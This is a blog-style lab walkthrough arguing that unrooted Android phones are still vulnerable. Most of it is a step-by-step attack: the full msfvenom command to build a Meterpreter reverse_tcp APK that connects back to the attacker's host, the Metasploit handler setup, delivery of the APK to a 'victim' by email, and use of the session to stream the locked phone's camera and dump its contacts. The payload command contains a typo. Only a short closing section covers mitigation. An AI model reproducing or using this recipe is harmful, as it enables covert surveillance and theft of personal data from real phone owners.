We all have been told a rooted android phone is vulnerable. That brings me an additional question; “If an android phone is not-rooted, out-of-box condition, is it safe then?”

In the end of this posting, I’m gonna make a short story long and show you the answer to that question. If you are just looking for a short version of the answer; then the answer is “NO, it’s still not safe”

If you are trying to follow this step-by-step lab, you will need; 1. Kali Linux, 2. An Android phone, 3. The internet connection.


Step 1. Run “Terminal” in Kali and type

msfvenom -p android/meterpreter/reverse_tcp LHOST=your_Kali_IP add LORT=4444 R > ~/Desktop/themitigators.apk

‘your_Kali_IP’ is the IP address of your Kali linux. If you don’t know what’s your IP address, ‘ifconfig’ will tell you.

‘themitigators.apk’ can be any name.

Screen Shot 2017-11-09 at 5.18.17 PM.png

If the command has been successfully executed, the .apk file(in this case, ‘themitigators.apk’) will be placed on the desktop


Step 2. Now, launch the Metasploit by typing “msfconsole

Screen Shot 2017-11-09 at 5.22.53 PM.png

If you can see the following screen, you are ready for Step3.

Screen Shot 2017-11-09 at 5.25.10 PM.png

Step 3. Using the same terminal window, execute the following commands

3.1 use exploit/multi/handler
3.2 set payload android/meterpreter/reverse_tcp
3.3 set lhost your_Kali_IP
3.4 set lport 4444
3.5 exploit

Screen Shot 2017-11-09 at 5.28.51 PM.pngNow the reverse TCP handler will be waiting for the victim to download/launch the payload ‘themitigators.apk


Step 4. Deliver the payload to the target. Let’s say, through email.

Step 5. Now the victim receives/opens the .apk (hopefully..)



Step 6. Once the victim has successfully installed/launch the .apk, the attacker will have a connection established.

Screen Shot 2017-11-09 at 5.40.23 PM.png

Now let’s what can we do to this poor victim. First, let’s type ‘help’ to see the list of things we can do while this session is alive.

Screen Shot 2017-11-09 at 5.43.16 PM.png

I’m already seeing some interesting keywords like; webcam_stream, dump_contact, wlan_geolocate and more.

Here are the result of each command I’d tried.

A. webcam_stream

Streaming from rear camera was successful. Although the phone’s screen was locked, and the camera app wasn’t running, I was able to see whatever the same things the rear camera sees. However, depends on how busy your network is, the video might come up in 15~30 seconds or just simply be lagging a lot.

Screen Shot 2017-11-09 at 5.46.44 PM.png

B. dump_contacts

Screen Shot 2017-11-09 at 5.49.59 PM.png

Dumping the contact list from the victim’s phone was successful. The dumped contact list automatically saved under home folder.

Screen Shot 2017-11-09 at 5.55.05 PM.png

And the contact dump is displayed in well organized format.

Screen Shot 2017-11-09 at 5.56.57 PM.png


Like all other form of reverse_tcp attack, the victim is the key. If user doesn’t download/run the .apk, the user will be safe. But, well, that’s not the case in real life. And obviously, this lab works with an android phone that’s never been rooted. So, “Do not rooting your phone” is not the answer to this as well.

One thing easily can be done to mitigate this type of attack will be disabling “Unknown Source” in settings/security menu.Screen Shot 2017-11-09 at 6.02.45 PM.png

Since ‘themitigators.apk’ was generated by msfconsole and was not downloaded from Play Store, by disabling “Unknown Sources”, the phone will prevent the .apk from running.
If you have an anti-malware protection on your phone, it would detect the apk file and shut down the connection to the attacker, even if the victim manually gives a go.

Screen Shot 2017-11-09 at 6.10.09 PM.png



Please enter your comment!
Please enter your name here